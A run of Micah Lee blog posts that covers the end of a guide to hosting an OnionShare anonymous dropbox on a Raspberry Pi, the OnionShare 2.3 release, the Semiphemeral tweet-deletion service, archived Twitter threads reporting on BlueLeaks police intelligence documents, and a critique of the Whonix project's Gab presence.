<p>If you quit OnionShare by pressing Ctrl-C, then run that same command over again (in the terminal press up arrow, then enter), it should start OnionShare again, and the URL should be exactly the same. This is important because if you ever have to quit OnionShare (like maybe you need to unplug the Raspberry Pi and plug it in somewhere else, forcing it to reboot), you'll be able to get your anonymous dropbox up and running again with the same address.</p>
<p>...and yup, I just confirmed persistence works on my end.</p>
<p>You may wish to copy and paste the contents of this file into a note field in your password manager, or otherwise make a secure backup of it. This way when you spill coffee all over your Raspberry Pi, you can get up and running again without too much trouble.</p>
<h2 id="run-onionshare-in-a-screen-session-so-you-can-close-your-terminal">Run OnionShare in a screen session so you can close your terminal</h2><p>So far this works great, but there's a big problem: When you SSH into a remote server (the Pi) and run a command (<code>onionshare-cli</code>), if you close your terminal, get disconnected from wifi, or otherwise end your SSH session, it will close <code>onionshare-cli</code> as well. Ideally you want it to just always be open and running in the background.</p>
<p>A simple way of doing this is using the program <code>screen</code>, a terminal multiplexer (you can also use <code>tmux</code> or whatever else you prefer). If OnionShare is running on your Raspberry Pi, quit it with Ctrl-C. Then from a terminal, install screen and download a simple <code>.screenrc</code> file so it will look a bit nicer:</p>
<pre>
sudo apt install -y screen
wget https://raw.githubusercontent.com/micahflee/dotfiles/master/.screenrc
</pre><p>Then run <code>screen</code>:</p>
<pre>
screen
</pre><p>You should see a new bar at the bottom of the screen with <code>0 bash</code> highlighted in yellow. This means you're inside a screen session now. (If you want to get nerdy, you may with to teach yourself more about using <code>screen</code> or similar terminal multiplexers.)</p>
<p><em>Now</em> run <code>onionshare-cli</code> again:</p>
<p><img src="onionshare-screen.png" alt=""></p>
<p>Now go ahead and completely close out of the terminal window, and make sure your you can still load your OnionShare address. It should load fine, because <code>onionshare-cli</code> should still be running on the Pi in your <code>screen</code> session.</p>
<p>Now let's get back in. Open a new terminal and SSH back into the Pi:</p>
<pre>
ssh ubuntu@192.168.1.46
</pre><p>Once you're in, reconnect your <code>screen</code> session:</p>
<pre>
screen -x
</pre><p>You should see your OnionShare anonymous dropbox again.</p>
<h2 id="some-final-thoughts">Some final thoughts</h2><p>After following this guide, you should have:</p>
<ul>
<li>A Raspberry Pi with Ubuntu Server 20.04 installed on it</li>
<li>The ability to SSH into the server to remotely configure it</li>
<li>An OnionShare anonymous dropbox running in a screen session</li>
<li>The ability to access all the files that get uploaded to your anonymous dropbox on your normal computer</li>
</ul>
<p>Congratulations! You're now equipped to accept leaks from the public. Just let people know that they can load your OnionShare address in Tor Browser to send you stuff anonymously. Here are a few things to keep in mind:</p>
<p>You can keep an eye on it by keeping a terminal open with the <code>screen</code> session attached to see when people access it, and regularly checking on the files that get uploaded.</p>
<p>Now that you're running a server, it's a good idea to regularly install updates so it doesn't get hacked, and keep an eye out for OnionShare updates as well (you'll be able to update <code>onionshare-cli</code> by running <code>pip3 install --upgrade onionshare-cli</code>). You might also want to do other things to harden your server like start using SSH keys instead of passwords or set up a firewall.</p>
<p><strong>Your Raspberry Pi's hard drive is not encrypted, which means if someone can physically access your Pi, they can simply unplug the microSD card, plug it into their own computer, and copy all of the documents people have uploaded to you.</strong> The best solution is to add disk encryption to this setup (perhaps this will be the target of a future blog post -- if you're interested in that, post in the comments). But in the meantime, whenever someone sends you anything sensitive, you can download it to your computer and then delete it from the Raspberry Pi, and <em>then</em> securely erase the free space on the Pi's microSD card so that it can't be recovered.</p>
<p>To securely delete free space, install the <code>secure-delete</code> package:</p>
<pre>
sudo apt install secure-delete
</pre><p>And then run <code>sfill</code> to fill up all of the free space from zeros:</p>
<pre>
sudo sfill -v -l /
</pre><p>In this command I'm using the flag <code>-l</code> which means "lessens the security. Only two passes are written: one mode with 0xff and a final mode with random values." -- though honestly I think this is fine for almost every use-case. This will take a very long time as it is, but if you leave off the <code>-l</code> it will take about 19 times longer, overwriting your free space 38 times instead of 2 times. (Run <code>man sfill</code> for more information.)</p>
<p><strong>Warning: Receive mode lets people upload files to your computer. Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.</strong></p>
<p>This warning is prominently displayed in OnionShare, and I think it's important to point out again. Just like why you're instructed not to open sketchy email attachments, you shouldn't just blindly open documents that you receive from OnionShare. For a trivial example, if you use Windows someone can send you <code>backdoor.exe</code>, and if you open that file, they will have hacked you.</p>
<p>If you do get a document and you're worried it might hack you when you open it, here are a few strategies to try:</p>
<ul>
<li>If it's an office document, run it through <a href="https://dangerzone.rocks/">Dangerzone</a> first. This is another piece of software I wrote that turns office documents into PDFs that you can be confident won't hack you.</li>
<li>If you're not concerned with sharing it with third parties:<ul>
<li>You can upload it to <a href="https://www.virustotal.com/">VirusTotal</a> to get it scanned by dozens of anti-virus programs, which might help inform if you want to open it or not.</li>
<li>You can also upload certain types of documents (including office docs, videos, and audio files) to Google Drive, and then view them in your web browser instead of programs like Word or VLC. If these documents would try to hack you, they'll instead try to hack some container running on Google's infrastructure, letting you view it safely.</li>
</ul>
</li>
<li>Set up a <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/">virtual machine</a>, turn networking off, copy the document to your VM, and open it there. If it's malicious it will try to hack your VM instead of your host computer, and if it tries to phone home it will fail because your VM doesn't have networking.</li>
</ul>
<p>Good luck, and I'd love to know if you're running an OnionShare anonymous dropbox of your own.</p>
<p>Oh and if you have any newsworthy leaks, feel free to send them my way: <a href="http://vxat6yszh7o5r2fxzvibxsb4lmfi6yzudobn3o3yz2vhvue3z2xmbqid.onion">http://vxat6yszh7o5r2fxzvibxsb4lmfi6yzudobn3o3yz2vhvue3z2xmbqid.onion</a></p>
OnionShare 2.3 adds tabs, anonymous chat, better command line support, and quite a bit more2021-02-21T00:00:00ZMicah Leeurn:uuid:9eaa3024-f620-3fda-a474-76a30dd7abf1<p>After a ridiculously long sixteen months (or roughly ten years in pandemic time) I'm excited to announce that OnionShare 2.3 is out! Download it from <a href="https://onionshare.org/">onionshare.org</a>.</p>
<p>This version includes loads of new and exciting features which you can read about in much more detail on the brand new OnionShare documentation website, <a href="https://docs.onionshare.org/">docs.onionshare.org</a>. For now though I'm just going to go over the major ones: tabs, anonymous chat, and better command line support.</p>
<h2 id="doing-all-the-things-at-once">Doing all the things at once</h2><p>In the olden days, OnionShare only did one thing: let you securely and anonymously share files over the Tor network. With time we added new features. You could use it as an <a href="https://micahflee.com/2019/02/onionshare-2/">anonymous dropbox</a>, and then later to <a href="https://micahflee.com/2019/10/new-version-of-onionshare-makes-it-easy-for-anyone-to-publish-anonymous-uncensorable-websites/">host an onion site</a>.</p>
<p>But what if you wanted to, for example, run your own anonymous dropbox <em>as well as</em> share files with someone? If your OnionShare was busy running a service, you couldn't run a second service without stopping the first service. This is all fixed now thanks to tabs.</p>
<p><img src="tabs.png" alt=""></p>
<p>Now when you open OnionShare you are presented with a blank tab that lets you choose between sharing files, receiving files, hosting a website, or chatting anonymous. You can have as many tabs open as you want at a time, and you can easily save tabs (that's what the purple thumbtack in the tab bar means) so that if you quit OnionShare and open it again later, these services can start back up with the same OnionShare addresses.</p>
<p>So with OnionShare 2.3 you can host a few websites, have your own personal anonymous dropbox, and securely send files to people whenever you want, all at the same time. Under the hood, the addition of tabs also makes OnionShare connect to the Tor network faster, especially if you're using a bridge.</p>
<h2 id="secure-anonymous-ephemeral-chat-rooms-that-don-t-log-anything">Secure, anonymous, ephemeral chat rooms that don't log anything</h2><p>Another major new feature is chat. You start a chat service, it gives you an OnionShare address, and then you send this address to everyone who is invited to the chat room (using an encrypted messaging app like Signal, for example). Then everyone loads this address in a <a href="https://www.torproject.org/">Tor Browser</a>, makes up a name to go by, and can have a completely private conversation.</p>
<p><img src="chat-torbrowser.png" alt=""></p>
<p>If you're already using an encrypted messaging app, what’s the point of an OnionShare chat room? It leaves fewer traces.</p>
<p>If, for example, you send a message to a Signal group, a copy of your message ends up on each device (the devices, and computers if they set up Signal Desktop of each member of the group). Even if disappearing messages is turned on it’s hard to confirm all copies of the messages are actually deleted from all devices, and from any other places (like notifications databases) they may have been saved to. OnionShare chat rooms don’t store any messages anywhere, so the problem is reduced to a minimum.</p>
<p>OnionShare chat rooms can also be useful for people wanting to chat anonymously and securely with someone without needing to create any accounts. For example, a whistleblower can send an OnionShare address to a journalist using a disposable e-mail address, and then wait for the journalist to join the chat room, all without compromising their anonymity.</p>
<p>Because OnionShare relies on Tor onion services, connections between the Tor Browser and OnionShare are all end-to-end encrypted (E2EE). When someone posts a message to an OnionShare chat room, they send it to the server through their E2EE onion connection. The OnionShare server then forwards the message to all other members of the chat room through the other members' E2EE onion connections, using WebSockets. OnionShare doesn’t implement any chat encryption on its own. It relies on the Tor onion service’s encryption instead.</p>
<p>Huge thanks to <a href="https://twitter.com/Saptak013">Saptak Sengupta</a> for developing the anonymous chat feature (doing the bulk of the work in like a single day (!), in the midst of a hacker con in Goa, India last March).</p>
<h2 id="onionshare-from-the-command-line">OnionShare from the command line</h2><p><img src="cli.png" alt=""></p>
<p>OnionShare 2.3 finally de-couples the command line and the graphical versions. You can install <code>onionshare-cli</code> on any platform, including headless Linux servers, <a href="https://pypi.org/project/onionshare-cli/">using pip</a>:</p>
<p><code>
pip3 install --user onionshare-cli
</code></p>
<p>You also need to have <code>tor</code> installed to use it from your package manager, or Homebrew if you're using macOS.</p>
<p>It's simple to use. For example, here's how you start a chat server:</p>
<p><img src="cli-chat.png" alt=""></p>
<p>I hope you enjoy the new version of OnionShare!</p>
<p><em>Note February 21, 2021: OnionShare 2.3 for Linux will be available in <a href="https://flathub.org/">Flathub</a> after <a href="https://github.com/flathub/flathub/pull/2129">this pull request</a> is reviewed and merged, so hang tight. In the meantime, it's already <a href="https://snapcraft.io/onionshare">available in Snapcraft</a> (though it logs analytics), or you can install the <code>.flatpak</code> file directly from <a href="https://onionshare.org/dist/2.3/">onionshare.org/dist/2.3</a>.</em></p>
<p><em>Update February 22, 2022: Version 2.3 had a bug where chat was broken :( but we just released version 2.3.1 which fixes it! :).</em></p>
<p><em>Update February 23, 2020: The Flatpak package is live! Linux users <a href="https://flathub.org/apps/details/org.onionshare.OnionShare">get it from Flathub</a>.</em></p>
Easily automate deleting your old tweets, likes, and DMs with Semiphemeral2020-09-10T00:00:00ZMicah Leeurn:uuid:7ca80a64-e639-346d-9b75-9f692798998e<p>Roughly one hundred years ago, in June of 2019, <a href="https://micahflee.com/2019/06/semiphemeral-automatically-delete-your-old-tweets-except-for-the-ones-you-want-to-keep/">I released</a> an <a href="https://github.com/micahflee/semiphemeral">open source</a> Twitter privacy tool called Semiphemeral that makes it simple-ish to delete years of old tweets. The great thing about Semiphemeral is, unlike similar tools, it's flexible: you don't have to delete <em>all</em> of your old tweets if you don't want to. You can, say, choose to keep tweets that have at least 20 likes, flag specific tweets you want to never delete, or delete all your retweets and likes that are older than a week.</p>
<p>But at the time, Semiphemeral was only usable by the nerdiest among us. It required running commands in a terminal window, creating your own Twitter API key, and, if you want to automate it, setting up a cron job on a server. But this is no longer the case!</p>
<p><strong>For the last several months I've been running an easy-to-use hosted version at <a href="https://semiphemeral.com/">Semiphemeral.com</a>. Now <em>anyone*</em> can easily delete their old tweets, likes, and now even direct messages (more on this below).</strong></p>
<p><img src="screenshot.png" alt=""></p>
<h1 id="semiphemeral-is-an-antifascist-service">Semiphemeral is an antifascist service</h1><p>*Well, <em>most people</em>.</p>
<p>In order to use Semiphemeral, you must follow <a href="https://twitter.com/semiphemeral">@semiphemeral</a> on Twitter. Supporters of dictators and anti-democratic demagogues, racists, or other types of fascists will be blocked, and blocked users are ineligible to use Semiphemeral. Everyone deserves privacy on social media, but not everyone is entitled to get that privacy by using this free service.</p>
<p>How does fascist detection work? Right now it's fairly simple. Semiphemeral maintains a list of popular fascist Twitter influencers: extremist demagogues like Trump in the US, Bolsonaro in Brazil, or Modi in India; popular neo-Nazi media personalities like Tucker Carlson or Ben Shapiro; and others.</p>
<p>When you start using Semiphemeral it downloads a history of your tweets and likes. If you've liked tweets from any of those fascists within the last few months, you get automatically blocked and are disqualified from using the service (it automatically unblocks you in a few months, in case you've changed since then).</p>
<p>This algorithm is prone to false positives, of course. Many perfectly reasonable people have at one point liked a Trump tweet, for whatever reason. So if you get blocked and you've only liked a few fascist tweets, Semiphemeral will let you unblock yourself and continue using the service. But if you've demonstrated a clear pattern of liking what fascists are spewing on Twitter, you have to write an email if you want to appeal your block.</p>
<h1 id="getting-started">Getting started</h1><p>Using the hosted Semiphemeral service is easy. Just go to <a href="https://semiphemeral.com/">https://semiphemeral.com/</a> and click "Login with Twitter". This will ask you to give Semiphemeral.com permission to delete your tweets and likes.</p>
<p><img src="twitter-auth.png" alt=""></p>
<p>As soon as you create your account, Semiphemeral starts downloading a history of your tweets. Depending on how long you've been using Twitter, this may take a long time. Twitter enforces <a href="https://developer.twitter.com/ja/docs/basics/rate-limits">rate limits</a>, which means Semiphemeral will frequently have to stop and wait 15 minutes before it can continue.</p>
<p>In the meantime, you can go over to the Settings page and configure it exactly as you like. Here's how mine is configured:</p>
<ul>
<li>Delete tweets older than 30 days unless they have at least 20 retweets or at least 20 likes, and don't delete tweets that are part of a thread that contains at least one tweet that meets these thresholds</li>
<li>Unretweet tweets older than 30 days and unlike tweets older than 60 days</li>
<li>Delete direct messages older than 14 days</li>
</ul>
<p><img src="settings-screenshot.png" alt=""></p>
<p>When it's done downloading your Twitter history, @semiphemeral will send you a Twitter direct message letting you know.</p>
<p>The next step is to go to the Tweets tab. This will show you all of the tweets that don't fit your criteria in Settings, and you can optionally exclude any of them from deletion. For example, Semiphemeral won't delete the tweet that verifies myself on the messaging app Keybase:</p>
<p><img src="keybase-screenshot.png" alt=""></p>
<p>After you've chosen the settings you want and chosen which tweets to manually exclude, you can go back to the Dashboard and click the "Start Semiphemeral" button. From this point on, once a day Semiphemeral will download your latest Twitter history and delete the older stuff based on your settings.</p>
<h1 id="deleting-direct-messages">Deleting direct messages</h1><p>Semiphemeral can also delete your old DMs, basically making them ephemeral (although keep in mind that when you delete a DM, the person you sent it to can still read it unless they delete it too).</p>
<p>When you first login to Semiphemeral, you give the app permission to delete your tweets but it doesn't have access to your DMs. If you want it to delete them, first you must give it access. You can find a link to authorize Semiphemeral to access your DMs on the Settings page under "Direct messages". This time you have to agree to an additional privilege.</p>
<p><img src="twitter-dms-auth.png" alt=""></p>
<p>There's another catch. Twitter only tells Semiphemeral about the last 30 days of your DMs. Because of this, Semiphemeral can't <em>automatically</em> delete all your old DMs, only those within the last 30 days. For example, if you configure it to delete DMs older than 7 days, each time it runs it will delete the DMs between 30 days ago and 7 days ago.</p>
<p>But if you have years and years of DMs you want to destroy, don't worry. You can still bulk delete them, you just need to give Semiphemeral a list of them. If you go to the DMs tab there's instructions on how to do this. But in short, you need to download a copy of your Twitter archive and them upload files that contain all of your historical DM metadata to Semiphemeral, and <em>then</em> it can delete all your older ones.</p>
<h1 id="semiphemeral-com-doesn-t-track-you">Semiphemeral.com doesn't track you</h1><p>You can see Semiphemeral's extremely <a href="https://semiphemeral.com/privacy">short and readable privacy policy here</a>, but the TLDR is: The service doesn't use any analytics software or log IP addresses, and there are no ads. It temporarily saves the content of your tweets, but then deletes that content when it deletes those tweets. It never accesses the content of your DMs.</p>
<p>It's hosted on the US-based cloud hosting provider DigitalOcean, and uses Stripe to process optional credit card tips.</p>
<h1 id="paid-for-by-tips">Paid for by tips</h1><p>Semiphemeral is totally free to use. I coded it in my spare time basically just because I wanted to use it myself. At the moment it's costing me roughly $60/month to pay for hosting (and if it gets considerably more popular, that amount will increase as well).</p>
<p>If you <3 Semiphemeral you can help me offset these costs by tipping (you can do this from the Tip tab when you're logged in), which is greatly appreciated.</p>
Twitter Thread: Northern California Regional Intelligence Center2020-08-17T00:00:00ZMicah Leeurn:uuid:44bdd2b0-e466-3001-9f20-cd09d3d6afbf<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1295382291741540353">https://twitter.com/micahflee/status/1295382291741540353</a></p>
<hr>
<p>I poured through two weeks of docs from the Northern California Regional Intelligence Center (police intelligence agency), between when George Floyd was killed while handcuffed face-down in the street, to when the BlueLeaks hacktivist exfiltrated the data <a href="https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/">https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/</a></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 141 Retweets, 566 Likes</em></p>
<hr>
<p>It turns out, starting May 31 NCRIC's terrorism liaison program began emailing PDFs listing upcoming protests to over 14,400 people, mostly local cops across northern California, emailing this twice a day at 10am and again at 6pm</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 18 Likes</em></p>
<hr>
<p>This PDF listed 46 protests scheduled for June 6 in San Francisco, San Jose, Palo Alto, Berkeley, Oakland, other cities, and 36 other events for following days. The vast majority of events were #BlackLivesMatter protests</p>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 5 Retweets, 16 Likes</em></p>
<hr>
<p>NCRIC's director Mike Sena says that NCRIC no longer sends these twice-daily emails. He says they started after a right-wing extremist killed a guard at Oakland's federal building, and stopped "I believe it was after the suspects were taken into custody" <a href="https://nbcnews.com/news/us-news/airman-charged-killing-federal-officer-during-george-floyd-protests-california-n1231187">https://nbcnews.com/news/us-news/airman-charged-killing-federal-officer-during-george-floyd-protests-california-n1231187</a></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 9 Likes</em></p>
<hr>
<p>"Really what we have here is over-broad collection and dissemination of peoples’ protected First Amendment activity, and it’s untethered to any basis in the law," an @ACLU_NorCal lawyers says. The docs also claim to be exempt from public records request, which isn't true</p>
<p><img src="image3a.png" alt="">
<img src="image3b.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 7 Retweets, 19 Likes</em></p>
<hr>
<p>NCRIC also regularly forwards fear-mongering memos from FBI, DHS, and other feds, containing cherrypicked anecdotes and tweets that make protesters seem scary and dangerous, to these 14k local cops across northern California. Like, consider this tweet</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">see a blue lives matter flag, destroy a blue lives matter flag challenge <a href="https://t.co/1IgudD82lK">https://t.co/1IgudD82lK</a></p>— Long Beach Anarchist Collective (@AnarchistLB) <a href="https://twitter.com/AnarchistLB/status/1265780248345370624?ref_src=twsrc%5Etfw">May 27, 2020</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 5 Retweets, 12 Likes</em></p>
<hr>
<p>An LA-based FBI analyst saw it and wrote this report called "Civil Unrest in Response to Death of George Floyd Threatens Law Enforcement Supporters’ Safety". NCRIC then forwarded this document to its list of 14k cops</p>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 15 Likes</em></p>
<hr>
<p>There's so much more like this too. NCRIC steadily forwarded docs from feds to local cops saying things like this. If cops believe their lives are in danger, this might help explain why their response to peaceful protests have been so brutal and violent</p>
<p><img src="image5a.png" alt="">
<img src="image5b.jpg" alt="">
<img src="image5c.jpg" alt="">
<img src="image5d.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 6 Retweets, 17 Likes</em></p>
<hr>
<p>Oh yeah, and one of the documents tries to lay blame for the massive nationwide outrage against police killings of Black people on "foreign influence campaigns"</p>
<p><img src="image6.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 8 Retweets, 14 Likes</em></p>
<hr>
<p>NCRIC was so busy spying on protesters that it had to postpone its class about spying on cell phones</p>
<p><img src="image7a.png" alt="">
<img src="image7b.jpg" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 10 Retweets, 23 Likes</em></p>
<hr>
<p>Local cops across northern California logged into NCRIC and submitted "Suspicious Activity Reports" about local BLM protests, and also requested support monitoring social media related to these protests.</p>
<p>For example take this tweet</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">SAN JOSE. PLEASE JOIN US THIS SATURDAY JUNE 6TH AT SJSU WELCOME TO...“THE BLACK AMERICAN EXPERIENCE” <a href="https://t.co/1YihcmXNgl">pic.twitter.com/1YihcmXNgl</a></p>— jaydin donte geer (@jaydingeer) <a href="https://twitter.com/jaydingeer/status/1268045070042689537?ref_src=twsrc%5Etfw">June 3, 2020</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 2 Retweets, 9 Likes</em></p>
<hr>
<p>A San Jose State University cop posted a SAR under the category "Radicalization/Extremism" saying, "Possible meeting spot for protest activity at SJSU. [...] Has been seen on Twitter under the name @simonvertugo."</p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 3 Retweets, 11 Likes</em></p>
<hr>
<p>Cops from these agencies posted SARs and support requests about BLM protests:</p>
<ul>
<li>Oakland PD</li>
<li>SFPD</li>
<li>San Benito Co Sheriff</li>
<li>Novato PD</li>
<li>Walnut Creek PD</li>
<li>Sunnyvale Dept of Public Safety</li>
<li>Antioch PD</li>
<li>Fremont PD</li>
<li>Napa POD</li>
<li>Healdsburg PD</li>
<li>Palo Alto PD</li>
<li>Golden Gate Bridge Patrol</li>
<li>Contra Costa College</li>
</ul>
<p><em>Posted: 8:29 AM · Aug 17, 2020, 3 Retweets, 12 Likes</em></p>
<hr>
<p>A group of people wearing black clothes and masks (during a pandemic) were at a gas station in Napa asking about renting vans to drop off in SF. Someone saw them, thought they "looked like a ‘ANTIF[A] or Black Bloc’ group" and it ended up as a SAR</p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 2 Retweets, 7 Likes</em></p>
<hr>
<p>The VAST MAJORITY of SARs related to civil unrest were about BLM protests or suspected antifa activity. But there were a few SARs about fascists too. Like this one, where someone called a gov employee and described his plans to shoot and kill protesters</p>
<p><img src="image8.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 3 Retweets, 9 Likes</em></p>
<hr>
<p>There were also two instances of police (from @RedwoodCityPD and @MoragaPolice) requesting help protecting racist white female teenagers against doxing/online harassment they faced after making racist statements and using anti-Black racial slurs</p>
<p><img src="image9a.png" alt="">
<img src="image9b.png" alt=""></p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 4 Retweets, 10 Likes</em></p>
<hr>
<p>BlueLeaks contains SO MUCH evidence of spying on First Amendment protected activities, systemic bias, etc. This was all from NCRIC, but there's also another 150 police/fusion center websites included the hack. Stay tuned for much more reporting</p>
<p><em>Posted 8:29 AM · Aug 17, 2020, 10 Retweets, 33 Likes</em></p>
Twitter Thread: The BlueLeaks hack of 251 law enforcement websites exposes personal data of over 700,000 cops2020-07-15T00:00:00ZMicah Leeurn:uuid:531ff1f9-7600-3ce4-9d42-504edab2d29f<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1283418665212211200">https://twitter.com/micahflee/status/1283418665212211200</a></p>
<hr>
<p>The BlueLeaks hack of 251 law enforcement websites exposes personal data of over 700,000 cops. Here is my analysis of the massive 269gb data set <a href="https://theintercept.com/2020/07/15/blueleaks-anonymous-ddos-law-enforcement-hack/">https://theintercept.com/2020/07/15/blueleaks-anonymous-ddos-law-enforcement-hack/</a></p>
<p><em>Posted 8:10 AM · Jul 15, 2020, 558 Retweets, 1,068 Likes</em></p>
<hr>
<p>The hacked websites were built and hosted by Texas web development firm Netsentiel. They're written in ASPNET/VBScript and running on Windows servers. They all run the same custom, insecure CMS, which is likely why they all got hacked with their data exfiltrated</p>
<p><em>Posted 8:14 AM · Jul 15, 2020, 29 Retweets, 155 Likes</em></p>
<hr>
<p>The hacked websites are mostly for "fusion centers" designed to share intelligence between feds and state and local cops. Many are devoted specifically to protecting oil companies, banks, and other industry</p>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 8:16 AM · Jul 15, 2020, 54 Retweets, 167 Likes</em></p>
<hr>
<p>Here is an anecdote I discovered in the data, among hundreds of thousands of others. A week after George Floyd's murder, a student in Oregon contacted law firms asking for consent to add them to a list of pro bono legal resources for protesters</p>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 148 Retweets, 393 Likes</em></p>
<hr>
<p>A Bay Area lawyer who received this message was pissed. He mailed this anonymous, unhinged, all-caps rant to the Marin County DA -- "CANNOT RISK THIS PIECE OF SHIT ANTIFA [...] FILING A BAR COMPLAINT AGAINST ME". He ended it with "HAPPY HUNTING"</p>
<p><img src="image3.png" alt=""></p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 96 Retweets, 371 Likes</em></p>
<hr>
<p>An investigator at the DA's office must have thought that this was useful intelligence. She uploaded a scan of the letter to the Northern California Regional Intelligence Center (one of the hacked fusion centers) as a "Suspicious Activity Report"</p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 39 Retweets, 282 Likes</em></p>
<hr>
<p>Under category she put "Radicalization/Extremism", and under Subject she put the Oregon student's name, writing that the student "appears to be a member of the Antifa group and is assisting in planning protesting efforts in the Bay Area despite living in Oregon"</p>
<p><em>Posted 8:24 AM · Jul 15, 2020, 46 Retweets, 303 Likes</em></p>
<hr>
<p>The unhinged Bay Area lawyer apparently isn't suspected of radicalization/extremism (even though he's clearly a right-wing extremist), but the polite college student is.</p>
<p>The return address on the envelope is the SF DA's office -- we couldn't confirm if the lawyer works with them</p>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 8:26 AM · Jul 15, 2020, 76 Retweets, 523 Likes</em></p>
Problematic behavior from the Whonix project2020-06-22T00:00:00ZMicah Leeurn:uuid:e8edcec2-f36d-3b75-9815-3f7872987c0e<p><strong>April 5, 2022: There is an update at the bottom of the post.</strong></p>
<p><em>Content warning: This blog post mentions sexual assault and anti-Semitic terrorism.</em></p>
<p>The first sign that something weird was going on with the <a href="https://www.whonix.org/">Whonix</a> project -- software, which is integrated into the <a href="https://www.qubes-os.org/">Qubes</a> operating system, that allows you to run anonymous VMs that force all your internet traffic through the <a href="https://www.torproject.org/">Tor network</a>, run primarily by Patrick Schleizer -- was in September 2018 when the project's official Twitter account <a href="https://archive.is/spckm">tweeted</a>, "We miss Jacob Appelbaum."</p>
<p><img src="whonix-tweet.png" alt=""></p>
<p>Jacob Appelbaum is a serial rapist who, in 2016, was kicked out of Tor Project and the internet freedom community after a group of his victims <a href="https://www.theguardian.com/technology/2016/oct/11/jacob-appelbaum-tor-project-sexual-assault-allegations">organized to expose him</a>. The link in the Whonix tweet was to a copy of Citizenfour, Laura Poitras's 2014 documentary about Edward Snowden, which featured Appelbaum before he was exposed as a sexual predator.</p>
<p>Whonix promptly <a href="https://twitter.com/Whonix/status/1041600435478573056">deleted</a> the tweet, and the issue was largely forgotten.</p>
<p>Then earlier this year someone <a href="https://social.linux.pizza/@syster/103815604895181197">reached out to me</a> on Mastodon, the open source federated social network, to point out that the Whonix project has an account on Gab.</p>
<p><img src="whonix-fediverse.png" alt=""></p>
<p>Gab is a white supremacist social network which was founded in 2016 in an alt-right cesspool but really gained infamy in 2018 after it came out that Robert Bowers, the neo-Nazi that murdered 11 people in a terrorist attack at a synagogue in Pittsburgh, was an <a href="https://www.usatoday.com/story/tech/nation-now/2018/10/29/gab-goes-offline-pittsburgh-synagogue-shooting/1804582002/">avid user</a>.</p>
<p>Until today, I was indeed on the front page of the Whonix website (quoting an <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/">article I wrote</a> for the Intercept about VMs), along with Snowden and quotes from a bunch of organizations that I think might not be happy with associating with Whonix if they knew about the project's apparent fascist sympathies.</p>
<p><img src="whonix-homepage.png" alt=""></p>
<p><em>Screenshot from the whonix.org homepage</em></p>
<p>And the footer of every page on the Whonix wiki, which is the majority of whonix.org, has a prominent link to Gab.</p>
<p><img src="whonix-footer.png" alt=""></p>
<p><em>Screenshot from the footer of the Whonix wiki</em></p>
<p>After reading that toot (in Mastodon, tweets are called "toots") I meant to contact Patrick Schleizer and ask him what's going on with Whonix's Gab profile and see if he has an explanation, but I got busy and forgot about it until a few months later.</p>
<p>Last month, Nina Alter, a user experience designer that works with the Qubes and SecureDrop projects, pinged me on Signal to ask some questions about Whonix. She was working on securing funding to improve Whonix's usability. When I told her about how Whonix has an account on Gab and promotes it in the footer of their website, she was quite naturally disturbed.</p>
<p>Before writing her grant proposal, Nina wanted to get to the bottom of it. She emailed Patrick saying that the affiliation with Gab is a major concern that must be addressed before continuing with the grantwriting, but he never emailed back. Nina did not write the grant proposal.</p>
<p>Miguel Jacq is a freelance system administrator and an <a href="https://onionshare.org/">OnionShare</a> developer who has been doing freelance devops work for the Whonix project for a few years. He was also recently made aware of Whonix's Gab connection, so he contacted Patrick expressing concern that Whonix was associating itself with a neo-Nazi social network, envisaging that it could harm the reputation of the project. Patrick never responded to this concern.</p>
<p>"I find difficulty aligning my own personal ethics regarding the matter, with the merits of participating in what has otherwise been to date an important and rewarding project," Miguel told me. "I don't really believe Patrick holds any extreme right-wing views, so for me it makes no sense to have that presence on Gab. Whonix does really important work, but software is political. It's not fun as a left-wing person to have people approach me saying 'Why are you involved with that project, they seem to endorse Gab'. I can't just ignore that and say the software alone matters."</p>
<p>Earlier this month, Miguel formally <a href="https://rezo.mig5.net/@mig5/104321869006611558">stepped down</a> from working with Whonix.</p>
